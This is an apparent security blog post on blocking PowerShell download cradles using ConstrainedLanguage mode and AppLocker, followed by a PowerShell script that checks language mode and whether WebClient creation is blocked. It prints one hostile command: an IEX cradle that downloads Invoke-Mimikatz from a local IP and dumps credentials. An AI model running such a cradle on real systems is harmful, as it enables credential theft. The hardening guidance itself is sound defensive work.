As we know, PowerShell can be much more than a scripting platform once administrative rights are involved.
Running unsigned processes and scripts lets an attacker advance one more step toward the objective.
Mimikatz and other painful tools are spotted by antivirus and antimalware, but when they bypass those controls we are exposed to one of the most common suspicious activities in PowerShell today.
Using an IEX download cradle to fetch a new file is one of them.
Simply host the PS script and run the following:
"IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
PowerShell can limit access to the above command by using Language Mode:
FullLanguage – permits all language elements in the session.
ConstrainedLanguage – permits all Windows cmdlets and all PowerShell language elements, but limits the permitted types: no direct .NET scripting, no Win32 API access via Add-Type, and no interaction with COM objects.
It is highly recommended to harden the above with an AppLocker policy applied via GPO, so that local administrators cannot change it.
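The following is an added example, not part of the original post: it reports the language mode a session is running in, switches the current session to ConstrainedLanguage, and shows that the New-Object Net.WebClient step the cradle depends on is refused without anything being downloaded. It assumes PowerShell 5.1 or later on Windows; the function names are my own, and Get-AppLockerPolicy is only available where the AppLocker module is installed.

```powershell
# Added example (not from the original post). Assumes PowerShell 5.1+ on Windows.
# Function names below are hypothetical helpers written for this demonstration.

function Get-LanguageModeReport {
    # Report the effective language mode of this session, the machine-wide
    # __PSLockdownPolicy variable PowerShell honours, and the engine version.
    [pscustomobject]@{
        LanguageMode   = $ExecutionContext.SessionState.LanguageMode
        LockdownPolicy = [Environment]::GetEnvironmentVariable('__PSLockdownPolicy', 'Machine')
        PSVersion      = $PSVersionTable.PSVersion.ToString()
    }
}

function Test-DownloadCradleBlocked {
    # Attempt only the object creation the IEX cradle relies on (Net.WebClient);
    # no URL is contacted. In ConstrainedLanguage, New-Object on a non-core type
    # fails with "Cannot create type. Only core types are supported in this
    # language mode.", which is what stops the cradle before any fetch happens.
    try {
        $null = New-Object System.Net.WebClient
        return $false   # object created: a cradle would run in this session
    } catch {
        return $true    # creation refused by the language mode
    }
}

# 1. What mode is this session in right now?
Get-LanguageModeReport | Format-List

# 2. Drop this session to ConstrainedLanguage. The change is one-way for the
#    session (a constrained session cannot raise itself back to FullLanguage),
#    but a freshly started powershell.exe is FullLanguage again, so this only
#    demonstrates the effect; it is not the hardening itself.
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'

# 3. Confirm the WebClient-based cradle now fails before any script is fetched.
"Cradle blocked: $(Test-DownloadCradleBlocked)"   # True in ConstrainedLanguage

# 4. For a machine-wide setting local admins cannot simply undo, enforce it by
#    policy: with an AppLocker script rule collection enforced via GPO,
#    PowerShell 5+ runs interactive sessions and scripts not allowed by the
#    policy in ConstrainedLanguage. Read-only check of the effective policy:
Get-AppLockerPolicy -Effective -Xml |
    Select-String -Pattern 'RuleCollection Type="Script"'
```

Run step 4 on a host without an AppLocker policy and Select-String returns nothing, which is itself the finding: language mode is then only as strong as whatever each session chooses to set.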